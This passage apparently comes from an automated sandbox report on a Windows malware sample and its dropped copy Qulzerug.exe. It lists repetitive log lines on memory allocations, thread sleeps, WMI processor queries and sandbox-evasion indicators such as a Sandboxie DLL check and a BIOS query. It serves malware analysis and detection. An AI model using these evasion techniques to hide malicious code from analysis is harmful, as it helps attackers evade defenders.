                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: 6Ek4nfs2y1.exe PID: 7364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 8060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Qulzerug.exe PID: 1816, type: MEMORYSTR
                  Source: 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, 6Ek4nfs2y1.exe, 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Qulzerug.exe, 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 4840000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 6440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 7440000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeMemory allocated: 4F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 4AF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 65A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 75A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 25F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 45F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 6010000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 7010000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 1610000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 3360000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 1840000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 1020000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 2D50000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeMemory allocated: 10D0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeWindow / User API: threadDelayed 1634Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeWindow / User API: threadDelayed 4691Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWindow / User API: threadDelayed 2332Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWindow / User API: threadDelayed 7484Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWindow / User API: threadDelayed 1607Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWindow / User API: threadDelayed 3786Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7464Thread sleep count: 1634 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7456Thread sleep count: 4691 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -99000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98779s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98588s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98266s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -98047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97606s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97390s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97257s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -97047s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -96935s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7436Thread sleep time: -96828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exe TID: 7392Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8124Thread sleep count: 2332 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8124Thread sleep count: 7484 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99868s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99719s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -99101s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98106s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -98000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97889s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97782s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97657s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97407s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97297s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -97063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96813s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96688s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96578s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96234s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96125s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -96016s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95906s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95780s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95672s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95563s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95203s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -95094s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94736s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94592s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 8096Thread sleep time: -94375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6956Thread sleep count: 1607 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6956Thread sleep count: 3786 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99874s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99765s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -99094s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98985s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98860s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98735s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98610s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98485s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98360s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98235s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -98110s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97954s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97806s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97685s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97557s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -97078s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 7212Thread sleep time: -96957s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exe TID: 6704Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99765Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99437Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99109Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 99000Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98891Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98779Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98588Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98484Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98375Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98266Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 98047Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97937Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97828Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97718Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97606Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97500Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97390Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97257Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97156Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 97047Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 96935Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 96828Jump to behavior
                  Source: C:\Users\user\Desktop\6Ek4nfs2y1.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99868Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99719Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 99101Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Qulzerug.exeThread delayed: delay time: 98485Jump to behavior
